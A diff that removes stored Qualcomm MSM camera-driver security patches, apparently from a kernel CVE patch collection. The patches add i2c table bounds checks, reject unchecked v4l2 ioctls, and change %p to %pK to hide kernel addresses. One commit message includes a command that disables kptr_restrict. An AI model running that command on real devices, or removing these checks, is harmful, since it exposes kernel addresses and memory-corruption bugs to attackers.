-Date: Wed, 14 Sep 2016 07:03:44 -0700
-Subject: msm: sensor: validate the i2c table index before use
-
-Verifying the i2c table index value before accessing
-the i2c table to avoid memory corruption issues.
-
-CRs-Fixed: 1065916
-Change-Id: I0e31c22f90006f27a77cd420288334b8355cee95
-Signed-off-by: Sureshnaidu Laveti <lsuresh@codeaurora.org>
----
- .../platform/msm/camera_v2/sensor/actuator/msm_actuator.c  | 14 +++++++++-----
- 1 file changed, 9 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-index 0b3e4e1..bf39738 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-@@ -101,11 +101,6 @@ static void msm_actuator_parse_i2c_params(struct msm_actuator_ctrl_t *a_ctrl,
- 	i2c_tbl = a_ctrl->i2c_reg_tbl;
- 
- 	for (i = 0; i < size; i++) {
--		/* check that the index into i2c_tbl cannot grow larger that
--		the allocated size of i2c_tbl */
--		if ((a_ctrl->total_steps + 1) < (a_ctrl->i2c_tbl_index))
--			break;
--
- 		if (write_arr[i].reg_write_type == MSM_ACTUATOR_WRITE_DAC) {
- 			value = (next_lens_position <<
- 				write_arr[i].data_shift) |
-@@ -119,6 +114,11 @@ static void msm_actuator_parse_i2c_params(struct msm_actuator_ctrl_t *a_ctrl,
- 					i2c_byte2 = value & 0xFF;
- 					CDBG("byte1:0x%x, byte2:0x%x\n",
- 						i2c_byte1, i2c_byte2);
-+					if (a_ctrl->i2c_tbl_index >
-+						a_ctrl->total_steps) {
-+						pr_err("failed:i2c table index out of bound\n");
-+						break;
-+					}
- 					i2c_tbl[a_ctrl->i2c_tbl_index].
- 						reg_addr = i2c_byte1;
- 					i2c_tbl[a_ctrl->i2c_tbl_index].
-@@ -139,6 +139,10 @@ static void msm_actuator_parse_i2c_params(struct msm_actuator_ctrl_t *a_ctrl,
- 			i2c_byte2 = (hw_dword & write_arr[i].hw_mask) >>
- 				write_arr[i].hw_shift;
- 		}
-+		if (a_ctrl->i2c_tbl_index > a_ctrl->total_steps) {
-+			pr_err("failed: i2c table index out of bound\n");
-+			break;
-+		}
- 		CDBG("i2c_byte1:0x%x, i2c_byte2:0x%x\n", i2c_byte1, i2c_byte2);
- 		i2c_tbl[a_ctrl->i2c_tbl_index].reg_addr = i2c_byte1;
- 		i2c_tbl[a_ctrl->i2c_tbl_index].reg_data = i2c_byte2;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6756/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-6756/3.10/0001.patch
deleted file mode 100644
index c1d409fc..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6756/3.10/0001.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-From f91d28dcba304c9f3af35b5bebaa26233c8c13a5 Mon Sep 17 00:00:00 2001
-From: Suman Mukherjee <sumam@codeaurora.org>
-Date: Thu, 29 Sep 2016 09:19:05 +0530
-Subject: msm: camera: cpp: Add validation for v4l2 ioctl arguments
-
-In CPP v4l2 ioctl command is made, if _IOC_DIR(cmd) is
-_IOC_NONE, then the user-supplied argument arg is not checked
-and an information disclosure is possible
-CRs-Fixed: 1042068
-
-Change-Id: Iddb291b10cdcb5c42ab8497e06c2ce47885cd5ab
-Signed-off-by: Suman Mukherjee <sumam@codeaurora.org>
-Signed-off-by: Sunid Wilson <sunidw@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 10 +++++++---
- 1 file changed, 7 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index ac0ba8e..964703c 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2495,14 +2495,14 @@ static int msm_cpp_validate_input(unsigned int cmd, void *arg,
- 		break;
- 	default:
- 		if (ioctl_ptr == NULL) {
--			pr_err("Wrong ioctl_ptr %pK\n", ioctl_ptr);
-+			pr_err("Wrong ioctl_ptr for cmd %u\n", cmd);
- 			return -EINVAL;
- 		}
- 
- 		*ioctl_ptr = arg;
- 		if ((*ioctl_ptr == NULL) ||
--			((*ioctl_ptr)->ioctl_ptr == NULL)) {
--			pr_err("Wrong arg %pK\n", arg);
-+			(*ioctl_ptr)->ioctl_ptr == NULL) {
-+			pr_err("Error invalid ioctl argument cmd %u\n", cmd);
- 			return -EINVAL;
- 		}
- 		break;
-@@ -2542,6 +2542,10 @@ long msm_cpp_subdev_ioctl(struct v4l2_subdev *sd,
- 		pr_err("cpp_dev is null\n");
- 		return -EINVAL;
- 	}
-+	if (_IOC_DIR(cmd) == _IOC_NONE) {
-+		pr_err("Invalid ioctl/subdev cmd %u", cmd);
-+		return -EINVAL;
-+	}
- 	rc = msm_cpp_validate_input(cmd, arg, &ioctl_ptr);
- 	if (rc != 0) {
- 		pr_err("input validation failed\n");
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6756/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-6756/3.18/0002.patch
deleted file mode 100644
index cbaf34cf..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6756/3.18/0002.patch
+++ /dev/null
@@ -1,1593 +0,0 @@
-From 3a214ef870dc97437c7de79a1507dfe5079dce88 Mon Sep 17 00:00:00 2001
-From: Azam Sadiq Pasha Kapatrala Syed <akapatra@codeaurora.org>
-Date: Thu, 10 Mar 2016 15:01:06 -0800
-Subject: msm: camera: Avoid exposing kernel addresses
-
-Usage of %p exposes the kernel addresses, an easy target to
-kernel write vulnerabilities. With this patch currently
-%pK prints only Zeros as address. If you need actual address
-echo 0 > /proc/sys/kernel/kptr_restrict
-
-CRs-Fixed: 987011
-Change-Id: I6c79f82376936fc646b723872a96a6694fe47cd9
-Signed-off-by: Azam Sadiq Pasha Kapatrala Syed <akapatra@codeaurora.org>
----
- .../platform/msm/camera_v2/common/cam_smmu_api.c   | 32 ++++++++--------
- .../platform/msm/camera_v2/common/cam_soc_api.c    | 26 ++++++-------
- .../msm/camera_v2/common/msm_camera_io_util.c      | 26 ++++++-------
- .../media/platform/msm/camera_v2/fd/msm_fd_hw.c    |  2 +-
- .../media/platform/msm/camera_v2/isp/msm_buf_mgr.c |  8 ++--
- .../media/platform/msm/camera_v2/isp/msm_isp46.c   |  2 +-
- .../media/platform/msm/camera_v2/isp/msm_isp47.c   |  2 +-
- .../platform/msm/camera_v2/isp/msm_isp_axi_util.c  | 16 ++++----
- .../msm/camera_v2/isp/msm_isp_stats_util.c         |  7 ++--
- .../platform/msm/camera_v2/isp/msm_isp_util.c      | 40 ++++++++++----------
- .../media/platform/msm/camera_v2/ispif/msm_ispif.c |  4 +-
- .../platform/msm/camera_v2/jpeg_10/msm_jpeg_hw.c   |  6 +--
- .../msm/camera_v2/jpeg_10/msm_jpeg_platform.c      |  2 +-
- .../platform/msm/camera_v2/jpeg_10/msm_jpeg_sync.c |  2 +-
- .../msm/camera_v2/jpeg_dma/msm_jpeg_dma_hw.c       |  2 +-
- .../media/platform/msm/camera_v2/msm_vb2/msm_vb2.c |  4 +-
- .../platform/msm/camera_v2/pproc/cpp/msm_cpp.c     | 33 +++++++++--------
- .../platform/msm/camera_v2/pproc/vpe/msm_vpe.c     |  8 ++--
- .../msm/camera_v2/sensor/actuator/msm_actuator.c   |  8 ++--
- .../platform/msm/camera_v2/sensor/cci/msm_cci.c    | 14 +++----
- .../platform/msm/camera_v2/sensor/csid/msm_csid.c  |  6 +--
- .../msm/camera_v2/sensor/csiphy/msm_csiphy.c       |  6 +--
- .../msm/camera_v2/sensor/eeprom/msm_eeprom.c       |  6 +--
- .../msm/camera_v2/sensor/flash/msm_flash.c         |  2 +-
- .../msm/camera_v2/sensor/io/msm_camera_dt_util.c   |  6 +--
- .../platform/msm/camera_v2/sensor/msm_sensor.c     | 18 ++++-----
- .../msm/camera_v2/sensor/msm_sensor_driver.c       | 43 ++++++++--------------
- .../msm/camera_v2/sensor/msm_sensor_init.c         | 12 +++---
- .../platform/msm/camera_v2/sensor/ois/msm_ois.c    |  4 +-
- 29 files changed, 167 insertions(+), 180 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/common/cam_smmu_api.c b/drivers/media/platform/msm/camera_v2/common/cam_smmu_api.c
-index e703791..5d5ceb7 100644
---- a/drivers/media/platform/msm/camera_v2/common/cam_smmu_api.c
-+++ b/drivers/media/platform/msm/camera_v2/common/cam_smmu_api.c
-@@ -229,7 +229,7 @@ static void cam_smmu_print_list(int idx)
- 	pr_err("index = %d ", idx);
- 	list_for_each_entry(mapping,
- 		&iommu_cb_set.cb_info[idx].smmu_buf_list, list) {
--		pr_err("ion_fd = %d, paddr= 0x%p, len = %u\n",
-+		pr_err("ion_fd = %d, paddr= 0x%pK, len = %u\n",
- 			 mapping->ion_fd, (void *)mapping->paddr,
- 			 (unsigned int)mapping->len);
- 	}
-@@ -240,10 +240,10 @@ static void cam_smmu_print_table(void)
- 	int i;
- 
- 	for (i = 0; i < iommu_cb_set.cb_num; i++) {
--		pr_err("i= %d, handle= %d, name_addr=%p\n", i,
-+		pr_err("i= %d, handle= %d, name_addr=%pK\n", i,
- 			   (int)iommu_cb_set.cb_info[i].handle,
- 			   (void *)iommu_cb_set.cb_info[i].name);
--		pr_err("dev = %p ", iommu_cb_set.cb_info[i].dev);
-+		pr_err("dev = %pK ", iommu_cb_set.cb_info[i].dev);
- 	}
- }
- 
-@@ -306,18 +306,18 @@ static void cam_smmu_check_vaddr_in_range(int idx, void *vaddr)
- 		end_addr = (unsigned long)mapping->paddr + mapping->len;
- 
- 		if (start_addr <= current_addr && current_addr < end_addr) {
--			pr_err("Error: va %p is valid: range:%p-%p, fd = %d cb: %s\n",
-+			pr_err("Error: va %pK is valid: range:%pK-%pK, fd = %d cb: %s\n",
- 				vaddr, (void *)start_addr, (void *)end_addr,
- 				mapping->ion_fd,
- 				iommu_cb_set.cb_info[idx].name);
- 			return;
- 		} else {
--			CDBG("va %p is not in this range: %p-%p, fd = %d\n",
-+			CDBG("va %pK is not in this range: %pK-%pK, fd = %d\n",
- 				vaddr, (void *)start_addr, (void *)end_addr,
- 				mapping->ion_fd);
- 		}
- 	}
--	pr_err("Cannot find vaddr:%p in SMMU. %s uses invalid virtual address\n",
-+	pr_err("Cannot find vaddr:%pK in SMMU. %s uses invalid virtual address\n",
- 		vaddr, iommu_cb_set.cb_info[idx].name);
- 	return;
- }
-@@ -393,7 +393,7 @@ static int cam_smmu_iommu_fault_handler(struct iommu_domain *domain,
- 
- 	if (!token) {
- 		pr_err("Error: token is NULL\n");
--		pr_err("Error: domain = %p, device = %p\n", domain, dev);
-+		pr_err("Error: domain = %pK, device = %pK\n", domain, dev);
- 		pr_err("iova = %lX, flags = %d\n", iova, flags);
- 		return 0;
- 	}
-@@ -705,7 +705,7 @@ static void cam_smmu_clean_buffer_list(int idx)
- 
- 	list_for_each_entry_safe(mapping_info, temp,
- 			&iommu_cb_set.cb_info[idx].smmu_buf_list, list) {
--		CDBG("Free mapping address %p, i = %d, fd = %d\n",
-+		CDBG("Free mapping address %pK, i = %d, fd = %d\n",
- 			 (void *)mapping_info->paddr, idx,
- 			mapping_info->ion_fd);
- 
-@@ -800,11 +800,11 @@ static int cam_smmu_map_buffer_and_add_to_list(int idx, int ion_fd,
- 	}
- 
- 	if (table->sgl) {
--		CDBG("DMA buf: %p, device: %p, attach: %p, table: %p\n",
-+		CDBG("DMA buf: %pK, device: %pK, attach: %pK, table: %pK\n",
- 				(void *)buf,
- 				(void *)iommu_cb_set.cb_info[idx].dev,
- 				(void *)attach, (void *)table);
--		CDBG("table sgl: %p, rc: %d, dma_address: 0x%x\n",
-+		CDBG("table sgl: %pK, rc: %d, dma_address: 0x%x\n",
- 				(void *)table->sgl, rc,
- 				(unsigned int)table->sgl->dma_address);
- 	} else {
-@@ -838,7 +838,7 @@ static int cam_smmu_map_buffer_and_add_to_list(int idx, int ion_fd,
- 		rc = -ENOSPC;
- 		goto err_unmap_sg;
- 	}
--	CDBG("ion_fd = %d, dev = %p, paddr= %p, len = %u\n", ion_fd,
-+	CDBG("ion_fd = %d, dev = %pK, paddr= %pK, len = %u\n", ion_fd,
- 			(void *)iommu_cb_set.cb_info[idx].dev,
- 			(void *)*paddr_ptr, (unsigned int)*len_ptr);
- 
-@@ -862,10 +862,10 @@ static int cam_smmu_unmap_buf_and_remove_from_list(
- {
- 	if ((!mapping_info->buf) || (!mapping_info->table) ||
- 		(!mapping_info->attach)) {
--		pr_err("Error: Invalid params dev = %p, table = %p",
-+		pr_err("Error: Invalid params dev = %pK, table = %pK",
- 			(void *)iommu_cb_set.cb_info[idx].dev,
- 			(void *)mapping_info->table);
--		pr_err("Error:dma_buf = %p, attach = %p\n",
-+		pr_err("Error:dma_buf = %pK, attach = %pK\n",
- 			(void *)mapping_info->buf,
- 			(void *)mapping_info->attach);
- 		return -EINVAL;
-@@ -989,7 +989,7 @@ static int cam_smmu_alloc_scratch_buffer_add_to_list(int idx,
- 
- 	CDBG("%s: nents = %lu, idx = %d, virt_len  = %zx\n",
- 		__func__, nents, idx, virt_len);
--	CDBG("%s: phys_len = %zx, iommu_dir = %d, virt_addr = %p\n",
-+	CDBG("%s: phys_len = %zx, iommu_dir = %d, virt_addr = %pK\n",
- 		__func__, phys_len, iommu_dir, virt_addr);
- 
- 	/* This table will go inside the 'mapping' structure
-@@ -1055,7 +1055,7 @@ static int cam_smmu_alloc_scratch_buffer_add_to_list(int idx,
- 	mapping_info->ref_count = 1;
- 	mapping_info->phys_len = phys_len;
- 
--	CDBG("%s: paddr = %p, len = %zx, phys_len = %zx",
-+	CDBG("%s: paddr = %pK, len = %zx, phys_len = %zx",
- 		__func__, (void *)mapping_info->paddr,
- 		mapping_info->len, mapping_info->phys_len);
- 
-@@ -1093,7 +1093,7 @@ static int cam_smmu_free_scratch_buffer_remove_from_list(
- 		&iommu_cb_set.cb_info[idx].scratch_map;
- 
- 	if (!mapping_info->table) {
--		pr_err("Error: Invalid params: dev = %p, table = %p, ",
-+		pr_err("Error: Invalid params: dev = %pK, table = %pK, ",
- 				(void *)iommu_cb_set.cb_info[idx].dev,
- 				(void *)mapping_info->table);
- 		return -EINVAL;
-diff --git a/drivers/media/platform/msm/camera_v2/common/cam_soc_api.c b/drivers/media/platform/msm/camera_v2/common/cam_soc_api.c
-index 33e1299..21ac680 100644
---- a/drivers/media/platform/msm/camera_v2/common/cam_soc_api.c
-+++ b/drivers/media/platform/msm/camera_v2/common/cam_soc_api.c
-@@ -165,7 +165,7 @@ int msm_camera_get_clk_info(struct platform_device *pdev,
- 			rc = PTR_ERR((*clk_ptr)[i]);
- 			goto err4;
- 		}
--		CDBG("clk ptr[%d] :%p\n", i, (*clk_ptr)[i]);
-+		CDBG("clk ptr[%d] :%pK\n", i, (*clk_ptr)[i]);
- 	}
- 
- 	devm_kfree(&pdev->dev, rates);
-@@ -289,7 +289,7 @@ int msm_camera_get_clk_info_and_rates(
- 			rc = PTR_ERR(clks[i]);
- 			goto err5;
- 		}
--		CDBG("clk ptr[%d] :%p\n", i, clks[i]);
-+		CDBG("clk ptr[%d] :%pK\n", i, clks[i]);
- 	}
- 	*pclk_info = clk_info;
- 	*pclks = clks;
-@@ -405,7 +405,7 @@ long msm_camera_clk_set_rate(struct device *dev,
- 	if (!dev || !clk || (clk_rate < 0))
- 		return -EINVAL;
- 
--	CDBG("clk : %p, enable : %ld\n", clk, clk_rate);
-+	CDBG("clk : %pK, enable : %ld\n", clk, clk_rate);
- 
- 	if (clk_rate > 0) {
- 		rate = clk_round_rate(clk, clk_rate);
-@@ -436,7 +436,7 @@ int msm_camera_put_clk_info(struct platform_device *pdev,
- 		if (clk_ptr[i] != NULL)
- 			devm_clk_put(&pdev->dev, (*clk_ptr)[i]);
- 
--		CDBG("clk ptr[%d] :%p\n", i, (*clk_ptr)[i]);
-+		CDBG("clk ptr[%d] :%pK\n", i, (*clk_ptr)[i]);
- 	}
- 	devm_kfree(&pdev->dev, *clk_info);
- 	devm_kfree(&pdev->dev, *clk_ptr);
-@@ -460,7 +460,7 @@ int msm_camera_put_clk_info_and_rates(struct platform_device *pdev,
- 	for (i = cnt - 1; i >= 0; i--) {
- 		if (clk_ptr[i] != NULL)
- 			devm_clk_put(&pdev->dev, (*clk_ptr)[i]);
--		CDBG("clk ptr[%d] :%p\n", i, (*clk_ptr)[i]);
-+		CDBG("clk ptr[%d] :%pK\n", i, (*clk_ptr)[i]);
- 	}
- 	devm_kfree(&pdev->dev, *clk_info);
- 	devm_kfree(&pdev->dev, *clk_ptr);
-@@ -531,7 +531,7 @@ int msm_camera_get_regulator_info(struct platform_device *pdev,
- 			rc = -EINVAL;
- 			goto err1;
- 		}
--		CDBG("vdd ptr[%d] :%p\n", i, tmp_reg[i].vdd);
-+		CDBG("vdd ptr[%d] :%pK\n", i, tmp_reg[i].vdd);
- 	}
- 
- 	*num_reg = cnt;
-@@ -607,7 +607,7 @@ void msm_camera_put_regulators(struct platform_device *pdev,
- 	for (i = cnt - 1; i >= 0; i--) {
- 		if (vdd_info[i] && !IS_ERR_OR_NULL(vdd_info[i]->vdd))
- 			devm_regulator_put(vdd_info[i]->vdd);
--			CDBG("vdd ptr[%d] :%p\n", i, vdd_info[i]->vdd);
-+			CDBG("vdd ptr[%d] :%pK\n", i, vdd_info[i]->vdd);
- 	}
- 
- 	devm_kfree(&pdev->dev, *vdd_info);
-@@ -646,7 +646,7 @@ int msm_camera_register_irq(struct platform_device *pdev,
- 		rc = -EINVAL;
- 	}
- 
--	CDBG("Registered irq for %s[resource - %p]\n", irq_name, irq);
-+	CDBG("Registered irq for %s[resource - %pK]\n", irq_name, irq);
- 
- 	return rc;
- }
-@@ -671,7 +671,7 @@ int msm_camera_register_threaded_irq(struct platform_device *pdev,
- 		rc = -EINVAL;
- 	}
- 
--	CDBG("Registered irq for %s[resource - %p]\n", irq_name, irq);
-+	CDBG("Registered irq for %s[resource - %pK]\n", irq_name, irq);
- 
- 	return rc;
- }
-@@ -703,7 +703,7 @@ int msm_camera_unregister_irq(struct platform_device *pdev,
- 		return -EINVAL;
- 	}
- 
--	CDBG("Un Registering irq for [resource - %p]\n", irq);
-+	CDBG("Un Registering irq for [resource - %pK]\n", irq);
- 	devm_free_irq(&pdev->dev, irq->start, dev_id);
- 
- 	return 0;
-@@ -730,7 +730,7 @@ void __iomem *msm_camera_get_reg_base(struct platform_device *pdev,
- 	}
- 
- 	if (reserve_mem) {
--		CDBG("device:%p, mem : %p, size : %d\n",
-+		CDBG("device:%pK, mem : %pK, size : %d\n",
- 			&pdev->dev, mem, (int)resource_size(mem));
- 		if (!devm_request_mem_region(&pdev->dev, mem->start,
- 			resource_size(mem),
-@@ -749,7 +749,7 @@ void __iomem *msm_camera_get_reg_base(struct platform_device *pdev,
- 		return NULL;
- 	}
- 
--	CDBG("base : %p\n", base);
-+	CDBG("base : %pK\n", base);
- 	return base;
- }
- EXPORT_SYMBOL(msm_camera_get_reg_base);
-@@ -793,7 +793,7 @@ int msm_camera_put_reg_base(struct platform_device *pdev,
- 		pr_err("err: mem resource %s not found\n", device_name);
- 		return -EINVAL;
- 	}
--	CDBG("mem : %p, size : %d\n", mem, (int)resource_size(mem));
-+	CDBG("mem : %pK, size : %d\n", mem, (int)resource_size(mem));
- 
- 	devm_iounmap(&pdev->dev, base);
- 	if (reserve_mem)
-diff --git a/drivers/media/platform/msm/camera_v2/common/msm_camera_io_util.c b/drivers/media/platform/msm/camera_v2/common/msm_camera_io_util.c
-index f978f97..51a9ea8 100644
---- a/drivers/media/platform/msm/camera_v2/common/msm_camera_io_util.c
-+++ b/drivers/media/platform/msm/camera_v2/common/msm_camera_io_util.c
-@@ -27,7 +27,7 @@
- 
- void msm_camera_io_w(u32 data, void __iomem *addr)
- {
--	CDBG("%s: 0x%p %08x\n", __func__,  (addr), (data));
-+	CDBG("%s: 0x%pK %08x\n", __func__,  (addr), (data));
- 	writel_relaxed((data), (addr));
- }
- 
-@@ -43,7 +43,7 @@ int32_t msm_camera_io_w_block(const u32 *addr, void __iomem *base,
- 		return -EINVAL;
- 
- 	for (i = 0; i < len; i++) {
--		CDBG("%s: len =%d val=%x base =%p\n", __func__,
-+		CDBG("%s: len =%d val=%x base =%pK\n", __func__,
- 			len, addr[i], base);
- 		writel_relaxed(addr[i], base);
- 	}
-@@ -62,7 +62,7 @@ int32_t msm_camera_io_w_reg_block(const u32 *addr, void __iomem *base,
- 		return -EINVAL;
- 
- 	for (i = 0; i < len; i = i + 2) {
--		CDBG("%s: len =%d val=%x base =%p reg=%x\n", __func__,
-+		CDBG("%s: len =%d val=%x base =%pK reg=%x\n", __func__,
- 			len, addr[i + 1], base,  addr[i]);
- 		writel_relaxed(addr[i + 1], base + addr[i]);
- 	}
-@@ -71,7 +71,7 @@ int32_t msm_camera_io_w_reg_block(const u32 *addr, void __iomem *base,
- 
- void msm_camera_io_w_mb(u32 data, void __iomem *addr)
- {
--	CDBG("%s: 0x%p %08x\n", __func__,  (addr), (data));
-+	CDBG("%s: 0x%pK %08x\n", __func__,  (addr), (data));
- 	/* ensure write is done */
- 	wmb();
- 	writel_relaxed((data), (addr));
-@@ -89,7 +89,7 @@ int32_t msm_camera_io_w_mb_block(const u32 *addr, void __iomem *base, u32 len)
- 	for (i = 0; i < len; i++) {
- 		/* ensure write is done */
- 		wmb();
--		CDBG("%s: len =%d val=%x base =%p\n", __func__,
-+		CDBG("%s: len =%d val=%x base =%pK\n", __func__,
- 			len, addr[i], base);
- 		writel_relaxed(addr[i], base);
- 	}
-@@ -102,7 +102,7 @@ u32 msm_camera_io_r(void __iomem *addr)
- {
- 	uint32_t data = readl_relaxed(addr);
- 
--	CDBG("%s: 0x%p %08x\n", __func__,  (addr), (data));
-+	CDBG("%s: 0x%pK %08x\n", __func__,  (addr), (data));
- 	return data;
- }
- 
-@@ -114,7 +114,7 @@ u32 msm_camera_io_r_mb(void __iomem *addr)
- 	data = readl_relaxed(addr);
- 	/* ensure read is done */
- 	rmb();
--	CDBG("%s: 0x%p %08x\n", __func__,  (addr), (data));
-+	CDBG("%s: 0x%pK %08x\n", __func__,  (addr), (data));
- 	return data;
- }
- 
-@@ -180,7 +180,7 @@ void msm_camera_io_dump(void __iomem *addr, int size, int enable)
- 	u32 *p = (u32 *) addr;
- 	u32 data;
- 
--	CDBG("%s: addr=%p size=%d\n", __func__, addr, size);
-+	CDBG("%s: addr=%pK size=%d\n", __func__, addr, size);
- 
- 	if (!p || (size <= 0) || !enable)
- 		return;
-@@ -216,12 +216,12 @@ void msm_camera_io_dump_wstring_base(void __iomem *addr,
- {
- 	int i, u = sizeof(struct msm_cam_dump_string_info);
- 
--	pr_debug("%s: addr=%p data=%p size=%d u=%d, cnt=%d\n", __func__,
-+	pr_debug("%s: addr=%pK data=%pK size=%d u=%d, cnt=%d\n", __func__,
- 		addr, dump_data, size, u,
- 		(size/u));
- 
- 	if (!addr || (size <= 0) || !dump_data) {
--		pr_err("%s: addr=%p data=%p size=%d\n", __func__,
-+		pr_err("%s: addr=%pK data=%pK size=%d\n", __func__,
- 			addr, dump_data, size);
- 		return;
- 	}
-@@ -233,7 +233,7 @@ void msm_camera_io_dump_wstring_base(void __iomem *addr,
- void msm_camera_io_memcpy(void __iomem *dest_addr,
- 	void __iomem *src_addr, u32 len)
- {
--	CDBG("%s: %p %p %d\n", __func__, dest_addr, src_addr, len);
-+	CDBG("%s: %pK %pK %d\n", __func__, dest_addr, src_addr, len);
- 	msm_camera_io_memcpy_toio(dest_addr, src_addr, len / 4);
- }
- 
-@@ -728,7 +728,7 @@ int msm_camera_request_gpio_table(struct gpio *gpio_tbl, uint8_t size,
- 	int rc = 0, i = 0, err = 0;
- 
- 	if (!gpio_tbl || !size) {
--		pr_err("%s:%d invalid gpio_tbl %p / size %d\n", __func__,
-+		pr_err("%s:%d invalid gpio_tbl %pK / size %d\n", __func__,
- 			__LINE__, gpio_tbl, size);
- 		return -EINVAL;
- 	}
-@@ -772,7 +772,7 @@ int msm_camera_get_dt_reg_settings(struct device_node *of_node,
- 	unsigned int cnt;
- 
- 	if (!of_node || !dt_prop_name || !size || !reg_s) {
--		pr_err("%s: Error invalid args %p:%p:%p:%p\n",
-+		pr_err("%s: Error invalid args %pK:%pK:%pK:%pK\n",
- 			__func__, size, reg_s, of_node, dt_prop_name);
- 		return -EINVAL;
- 	}
-diff --git a/drivers/media/platform/msm/camera_v2/fd/msm_fd_hw.c b/drivers/media/platform/msm/camera_v2/fd/msm_fd_hw.c
-index 680bdf5..a20f40a0 100644
---- a/drivers/media/platform/msm/camera_v2/fd/msm_fd_hw.c
-+++ b/drivers/media/platform/msm/camera_v2/fd/msm_fd_hw.c
-@@ -669,7 +669,7 @@ int32_t msm_fd_hw_set_dt_parms_by_name(struct msm_fd_device *fd,
- 				dt_reg_settings[i + MSM_FD_REG_ADDR_OFFSET_IDX],
- 				dt_reg_settings[i + MSM_FD_REG_VALUE_IDX] &
- 				dt_reg_settings[i + MSM_FD_REG_MASK_IDX]);
--			pr_debug("%s:%d] %p %08x\n", __func__, __LINE__,
-+			pr_debug("%s:%d] %pK %08x\n", __func__, __LINE__,
- 				fd->iomem_base[base_idx] +
- 				dt_reg_settings[i + MSM_FD_REG_ADDR_OFFSET_IDX],
- 				dt_reg_settings[i + MSM_FD_REG_VALUE_IDX] &
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c b/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c
-index 3331f0d..94e9745 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_buf_mgr.c
-@@ -62,13 +62,13 @@ static int msm_buf_check_head_sanity(struct msm_isp_bufq *bufq)
- 	}
- 
- 	if (prev->next != &bufq->head) {
--		pr_err("%s: Error! head prev->next is %p should be %p\n",
-+		pr_err("%s: Error! head prev->next is %pK should be %pK\n",
- 			__func__, prev->next, &bufq->head);
- 		return -EINVAL;
- 	}
- 
- 	if (next->prev != &bufq->head) {
--		pr_err("%s: Error! head next->prev is %p should be %p\n",
-+		pr_err("%s: Error! head next->prev is %pK should be %pK\n",
- 			__func__, next->prev, &bufq->head);
- 		return -EINVAL;
- 	}
-@@ -228,7 +228,7 @@ static void msm_isp_unprepare_v4l2_buf(
- 	struct msm_isp_bufq *bufq = NULL;
- 
- 	if (!buf_mgr || !buf_info) {
--		pr_err("%s: NULL ptr %p %p\n", __func__,
-+		pr_err("%s: NULL ptr %pK %pK\n", __func__,
- 			buf_mgr, buf_info);
- 		return;
- 	}
-@@ -255,7 +255,7 @@ static int msm_isp_map_buf(struct msm_isp_buf_mgr *buf_mgr,
- 	int ret;
- 
- 	if (!buf_mgr || !mapped_info) {
--		pr_err_ratelimited("%s: %d] NULL ptr buf_mgr %p mapped_info %p\n",
-+		pr_err_ratelimited("%s: %d] NULL ptr buf_mgr %pK mapped_info %pK\n",
- 			__func__, __LINE__, buf_mgr, mapped_info);
- 		return -EINVAL;
- 	}
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp46.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp46.c
-index e1e579b..f15f234 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp46.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp46.c
-@@ -920,7 +920,7 @@ static int msm_vfe46_start_fetch_engine(struct vfe_device *vfe_dev,
- 		rc = vfe_dev->buf_mgr->ops->get_buf_by_index(
- 			vfe_dev->buf_mgr, bufq_handle, fe_cfg->buf_idx, &buf);
- 		if (rc < 0 || !buf) {
--			pr_err("%s: No fetch buffer rc= %d buf= %p\n",
-+			pr_err("%s: No fetch buffer rc= %d buf= %pK\n",
- 				__func__, rc, buf);
- 			return -EINVAL;
- 		}
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp47.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp47.c
-index 603e83a..ebf38dd 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp47.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp47.c
-@@ -1058,7 +1058,7 @@ static int msm_vfe47_start_fetch_engine(struct vfe_device *vfe_dev,
- 		rc = vfe_dev->buf_mgr->ops->get_buf_by_index(
- 			vfe_dev->buf_mgr, bufq_handle, fe_cfg->buf_idx, &buf);
- 		if (rc < 0 || !buf) {
--			pr_err("%s: No fetch buffer rc= %d buf= %p\n",
-+			pr_err("%s: No fetch buffer rc= %d buf= %pK\n",
- 				__func__, rc, buf);
- 			return -EINVAL;
- 		}
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-index fbda545..a5952a5 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-@@ -725,7 +725,7 @@ void msm_isp_check_for_output_error(struct vfe_device *vfe_dev,
- 	int i;
- 
- 	if (!vfe_dev || !sof_info) {
--		pr_err("%s %d failed: vfe_dev %p sof_info %p\n", __func__,
-+		pr_err("%s %d failed: vfe_dev %pK sof_info %pK\n", __func__,
- 			__LINE__, vfe_dev, sof_info);
- 		return;
- 	}
